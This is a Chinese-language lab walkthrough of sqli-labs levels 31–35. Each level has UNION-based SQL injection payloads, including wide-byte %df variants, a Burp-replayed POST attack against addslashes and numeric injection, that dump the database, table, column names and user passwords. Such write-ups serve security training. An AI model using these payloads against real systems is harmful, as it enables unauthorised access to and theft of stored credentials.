第31关（ ") 闭合）

查数据库

?id=") union select 1,2,database() --+

查表

?id=") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

查列

?id=") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

查数据

?id= ") union select 1,2,group_concat(username,0x7e,password) from users --+

第32关（宽字节注入）

查数据库

?id=-1%df%27%20union%20select%201,database(),3%20--+

查表

?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

查列

?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+

查数据

?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

第33关（宽字节注入）

查数据库

?id=-1%df%27%20union%20select%201,database(),3%20--+

查表

?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

查列

?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+

查数据

?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

第34关（ post 宽字节）

本关使用addslashes函数对于账户和密码都进行转义

使用Burpsuite抓包，在登录的时候抓，然后发送到repeater

查数据库

%df' union select 1,database()#

查表

%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

查列

%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#

查数据

%df%27 union select 1,group_concat(password,username) from users#

第35关（数字闭合直接注入）

查数据库

?id=-1 union select 1,2,database()#

查表

?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()#

查列

?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273#

查数据

?id=-1 union select 1,2,group_concat(username,password)from users #